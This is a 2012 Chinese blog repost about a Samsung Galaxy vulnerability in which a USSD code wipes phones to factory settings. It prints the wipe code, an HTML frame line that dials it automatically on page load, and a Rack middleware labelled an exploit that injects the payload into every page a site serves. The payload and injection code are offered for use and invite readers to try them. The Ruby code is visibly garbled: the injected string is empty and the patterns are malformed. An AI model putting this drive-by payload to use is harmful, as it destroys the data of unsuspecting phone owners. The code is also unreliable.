Galaxy曝漏洞 一行代码可恢复出厂值

来源:岁月联盟 编辑:exp 时间:2012-09-27

SAMSUNG 包括 GALAXY S3 等数款智慧型手机存在严重的安全漏洞, 一行 USSD 代码就能格式化手机甚至毁损 SIM 卡!

目前确定有问题的手机如下:

Galaxy S3, Galaxy S2, Galaxy Ace, Galaxy Beam, Galaxy S

安全专家 Ravi Borgaonkar 于 Ekoparty security conference 中表示, SAMSUNG 旗下智慧型手机包括 SAMSUNG GALAXY S III, GALAXY S II, GALAXY Beam, GALAXY S Advance 与 GALAXY Ace, 只要使用者开启经由短信, NFC 近距离感应, 甚至是 QR code 所发送的一段 USSD 代码, 就能轻松格式化你的智慧型手机.

ok, 说了那么多, 关键的 USSD code 是啥勒??答案揭晓~~

*2767*3855#

也就是让你的手机自动播出 *2767*3855#

当然你也可以写在网页里面.

1 <frame src=’tel:*2767*3855%23′ />

请参考简易Rails代码.

来源:http://blog.vis.tw/?p=67&variant=zh-cn

游侠补充:

博主专门提示游侠,说这是最新的Android漏洞,4.0以上很多手机都有!不过游侠身边几部Android手机都是2.3、2.3版本的,没有升级到4.0、4.1。有这个版本的,并且不怕丢数据(其实可以提前备份)的兄弟可以测试下。也请大家自行测试并不要拿来做坏事!(因为即使给人恢复出厂值了,对你也没任何好处,但是却可以给别人带来损失!)

2012年9月26日 17:10:01 更新

有朋友说测试了,没问题……还有没有朋友测试?

/

2012年9月26日 18:58:55 更新

Rails程式码被移除了, 这边简单来一份吧(请勿用于非法用途.)

module Rack
class GalaxyS3Exploit
def initialize(app)
@app = app
end

def call(env)
res = @app.call(env)
if res[1]['Content-Type'] =~ /text//html/
res.tap do |res|
orig = res[2]
res[2] = [].tap do |body|
orig.each do |line|
body << line.sub(/(?=<//body>)/, “”)
end
orig.close if orig.respond_to?(:close)

res[1]['Content-Length'] = body.join.size.to_s if res[1]['Content-Length']
end
end
else
res
end
end
end
end